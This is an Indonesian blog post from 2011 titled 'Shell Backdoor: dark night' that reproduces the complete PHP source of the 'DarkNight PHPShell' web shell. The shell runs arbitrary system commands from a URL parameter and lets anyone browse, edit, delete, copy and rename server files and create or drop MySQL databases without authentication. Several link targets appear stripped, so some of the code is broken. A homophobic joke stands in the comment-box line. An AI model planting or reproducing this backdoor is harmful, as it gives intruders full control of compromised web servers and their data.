Shell Backdoor: dark night

dark night

Jumat, 04 November 2011

Diposting oleh salmin indramayu

$serversoft = $_SERVER['SERVER_SOFTWARE'];
$serveraddr = $_SERVER['SERVER_ADDR'];
$uname = php_uname();
$os = PHP_OS;
$head ="<body dir='ltr' alink='#00ff00' bgcolor='#000000' link='#FFFFFF' text='#FFFFFF' vlink='#FFFFFF'><font face='courier new' size='2' color='white'><center><br /><h2>[DarkNight] PHPShell</h2><br />by <a href=http://neodark.uni.cc/>ne0 d4rk fl00d3r</a><br /><br /></center>----------------------------------------------------------<br />Server Software: $serversoft <br />Remote Address: $serveraddr <br />uname : $uname<br />OS : $os<br />Shell File: $sh <br />----------------------------------------------------------<br /><center><br /><br /><a href=>Home</a> | <a href=>Browse File</a> | <a href=>PHP Info</a> | <a href=>Info and FAQ</a> | <a href=>MySQL</a> | <a href=>Self Remove</a>";
echo "<title>[DarkNight]-[ $web ]</title>";
if ($_GET['act']=="phpinfo")
{
phpinfo();
}
else if ($_GET['act']=="info")
{
echo $head;
echo "<br /><br />PHPWebShell by ne0 d4rk fl00d3r.<br />Use it with your own risk!<br />";
echo "<h2>PAY ATTENTION!</h2><br />All actions on this WebShell are WITHOUT ANY CONFIRMATION!";
echo " So, please be careful<br /><h2>How to Change Current Directory?</h2><br />On Input Box Called 'Navigate Folder', change it become the Directory what do you want to Navigate.";
echo "<br /><br /><h2>How to Make a new Directory?</h2><br />Type a new directory name on input box called 'Make a Directory'";
echo "<br /><br /><h2>Known Bugs</h2><br />I can't fix this bug, but you (maybe) can prevent it<br /><br />You can't View / Make Directory / or other File Action on file / subfolder on folder name with space ( ) example: 'Documents and Settings'";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
else if (! is_null($_GET['mkfile'])=="true")
{
echo $head;
$mkfile = $_GET['mkfile'];
$nulldata = "";
if (file_exists($mkfile)==0)
{
$hand = "fopen($mkfile, 'w')";
fopen($mkfile, 'w');
fclose($hand);
echo "File $mkfile Created Successfully";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
else
{
echo "The $mkfile is exist, File Creation failed";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
}
else if (! $_GET['del']==null)
{
echo $head;
$fvcked = $_GET['del'];
$fvckeddir = dirname($fvcked);
if (is_file($fvcked)=="true")
{
if (! unlink($fvcked))
{
echo "Deletetion Failed!";
}
else
{
echo "Deltetion Success!";
}
}
else
{
if (! rmdir($fvcked))
{
echo "Deletetion Failed!";
}
else
{
echo "Deltetion Success!";
}
}
echo "<br /><br /><a href=>Go back</a><br /><br />c0ded by ne0 d4rk fl00d3r";
}
else if (! is_null($_GET['view'])=="true")
{
echo $head;
$file = $_GET['view'];
$fvhandle = fopen($file, "r");
$curdir = dirname($file);
echo "Content of: $file<br />";
echo "---------------------<br />";
echo "<table>";
while(! feof($fvhandle))
{
echo "<tr>";
echo "<td><font face='courier new' size='2' color='white'>" . htmlentities(fgets($fvhandle)) . "<br /></td>";
echo "</tr>";
}
fclose($fvhandle);
echo "</table>";
echo "---------------------<br />";
echo "<br /><a href=>Go Back</a>";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
else if (! is_null($_GET['copy'])=="true")
{
$copy = $_GET['copy'];
$dest = $_GET['dest'];
$dcopy = dirname($copy);
$ddest = dirname($dest);
if (! is_null($dest)=="true")
{
echo $head;
if (!copy($copy, $dest))
{
echo "Copy Failed";
}
else
{
echo "Copy Success";
}
echo "<br /><br /><a href=>Go Back</a> Or <a href=>Destination Folder</a>";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
else
{
echo $head;
echo "<form method=get>File to Copy : <input type='text' name='copy' value=$copy> Destination : <input type='text' name='dest'><input type='submit' value='Copy'></form><br /><br />c0ded by ne0 d4rk fl00d3r";
}
}
else if (! is_null($_GET['ren'])=="true")
{
$ren = $_GET['ren'];
$dren = dirname($ren);
$target = $_GET['target'];
echo $head;
if (! is_null($_GET['target'])=="true")
{
if (!rename($ren, $target))
{
echo "Rename Failed";
}
else
{
echo "Rename Success";
}
echo "<br /><br /><a href=>Go Back</a><br /><br />c0ded by ne0 d4rk fl00d3r";
}
else
{
echo "<form method=get>File to Rename : <input type='text' name='ren' value=$ren> Destination : <input type='text' name='target' value=$dren><input type='submit' value='Rename'></form><br /><br />c0ded by ne0 d4rk fl00d3r";
}
}
else if ($_GET['act']=="selfremove")
{
echo $head ,"<br /><br />";
echo "Are you sure want to remove the DarkNight PHPShell?<br />";
echo "If you sure, enter the secret code (Secret Code is 'DarkScouter'): <form method=get><input type='text' name='remcode'><input type='submit' value='REMOVE'></form>";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
else if (! $_GET['remcode']=="")
{
$remcode = md5($_GET['remcode']);
if ($remcode=="92f2505cea7e4dc412359aeaf7c07c8f")
{
echo "DarkNight PHPShell Successfully removed, thanks for using DarkNight PHPShell";
unlink($_SERVER['PHP_SELF']);
}
else
{
echo "Hehe, you are not seriously want to remove this shell, ok, <a href=>Click here to go back</a>";
}
}
else if ($_GET['act']=="mysql")
{
if ($_GET['srv']=="")
{
echo $head;
echo "<br /><br /><form method=get>Connect MySQL<br /><br /><input type='hidden' value='mysql' name='act'><input type='hidden' value='browse' name='mysqlact'>Server : <input type='text' name='srv' value='localhost'><br />Username : <input type='text' name='usr'><br />Password : <input type='text' name='pass'><br /><br /><input type='submit' value='Connect'><br /><br />c0ded by ne0 d4rk fl00d3r";
}
else
{
echo $head;
echo "<br /><br />";
$srv = $_GET['srv'];
$usr = $_GET['usr'];
$pass = $_GET['pass'];
$con = mysql_connect($srv,$usr,$pass);
if (!$con)
{
echo "MySQL Error, could not connect. Reason: ". mysql_error();
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
exit();
}
if ($_GET['mysqlact']=="browse")
{
$db_list = mysql_list_dbs($con);
echo "<form method=get><input type='hidden' name='act' value='mysql'><input type='hidden' name='mysqlact' value='createdb'><input type='hidden' name='srv' value=$srv><input type='hidden' name='usr' value=$usr><input type='hidden' name='pass' value=$pass>Create New Database : <input type='text' name='createdb'><input type='submit' value='Create DB'></form><br /><br />";
echo "Select Database:<br /><br />";
echo "<table cellspacing='10' width='10'>";
while ($db = mysql_fetch_object($db_list))
{
echo "<tr>";
echo "<td><font face='courier new' size='2' color='white'><a href= . $db->Database . ">" . $db->Database . "</a></td>";
echo "<td><font face='courier new' size='2' color='white'><a href= . $db->Database . ">Drop</a></td>";
echo "<td><font face='courier new' size='2' color='white'><a href= . $db->Database . ">Browse</a></td>";
echo "</tr>";
}
echo "</table><br /><br />c0ded by ne0 d4rk fl00d3r";
}
else if ($_GET['mysqlact']=="createdb")
{
$crdb = $_GET['createdb'];
$sql = "CREATE DATABASE $crdb";
$sqlq = mysql_query($sql);
if (! $sqlq)
{
echo "Error Creating Database, Reason: ", mysql_error();
}
else
{
echo "Database $crdb sucessfully Created";
}
echo "<br /><br /><a href=>Go Back</a>";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
else if (! $_GET['dropdb']=="")
{
$drdb = $_GET['dropdb'];
$sql = "DROP DATABASE $drdb";
$sqlq = mysql_query($sql);
if (! $sqlq)
{
echo "Error Droping Database, Reason: ", mysql_error();
}
else
{
echo "Database $crdb sucessfully Dropped";
}
echo "<br /><br /><a href=>Go Back</a>";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
}
}
else if (! $_GET['cmd']=="")
{
echo $head;
$dir = $_GET['dir'];
$cmd = $_GET['cmd'];
chdir($dir);
echo "<br /><br />Executed Command is: $cmd<br /><br /><textarea rows='20' cols=70'>";
system($_GET['cmd']);
echo "</textarea>";
echo "<br /><br /><form method=get>Execute a command: <input type='text' name='cmd'><br />Current Directory: <input type='text' name='dir' value=$dir><br /><input type='submit' value='Execute!'></form>";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
else if (! $_GET['edit']=="")
{
$file = $_GET['edit'];
$content = file_get_contents($file);
echo $head;
echo "<br /><br />Editng file $file<br /><br />";
echo "<form method=get><input type='hidden' name='edit' value=$file><textarea name='content' rows='20' cols=70'>$content";
echo "</textarea><br /><br /><input type='submit' value='Save'></form>";
if (! $_GET['content']=="")
{
$content = $_GET['content'];
$file = $_GET['edit'];
$save = file_put_contents($file,$content);
if (! $save)
{
echo "Error Saving Data";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
else
{
$dsave = dirname($file);
echo "Saving Success";
echo "<br /><br /><a href=>Go Back</a>";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";
}
}
}
else
{
if (! $_GET['mkdir']=="") {
$mkd = $_GET['dir'];
chdir($mkd);
$nd = $_GET['mkdir'];
mkdir($nd, '0777');
}
else {}
if ($_GET['dir']=="") {
$base = getcwd();
$cd = $base;
}
else {
$dir = $_GET['dir'];
$cd = $dir;
$base = $cd;
}
chdir($cd);
echo $head;
echo "<br /><br />Navigate Folder : <form method=get><input type='text' name='dir' value=$base></form>";
echo "<br /><br />Navigation:[.] or [..] = go up 1 dir";
echo "<br /><br />Make a Directory : <form method=get><input type='hidden' name='dir' value=$base><input type='text' name='mkdir'></form>";
echo "<br /><br />";
$rdir = opendir($cd);
echo "<table cellspacing='10' width='10'>";
while (($file = readdir($rdir)) !== false)
{
$fpath = realpath($file);
str_replace("", "+", $fpath);
if (is_dir($file)=="false") { $dof = "DIR"; } else { $dof = filesize($file); }
if (is_dir($file)=="false") { $x = "["; $y = "]</td>"; $w = ""; $z = $file; } else { $x = "<a href=?view="; $y = ">$file</a></td>"; $z = $fpath; }
echo "<tr>";
echo "<td><font face='courier new' size='2' color='white'>$x$z$y";
echo "<td><font face='courier new' size='2' color='white'>$dof</td>";
echo "<td><font face='courier new' size='2' color='white'><a href=>Delete</a></td>";
echo "<td><font face='courier new' size='2' color='white'><a href=>Edit</a></td>";
echo "<td><font face='courier new' size='2' color='white'><a href=>Copy</a></td>";
echo "<td><font face='courier new' size='2' color='white'><a href=>Rename</a></td>";
echo "</tr>";
}
echo "</table>";
echo "</center><br /><br />----------------------------------------------------------<br />";
echo "Make a file: <form method=get><input type='text' name='mkfile' value=$cd><input type=submit value='Make new File'></form><br /><br /><form method=get>Execute a command: <input type='text' name='cmd'><br />Current Directory: <input type='text' name='dir' value=$cd><br /><input type='submit' value='Execute!'></form><br />----------------------------------------------------------<center>";
echo "<br /><br />c0ded by ne0 d4rk fl00d3r";

dark night

0 komentar:

Posting Komentar

dilarang junk, kecuali anda gay atau homo :)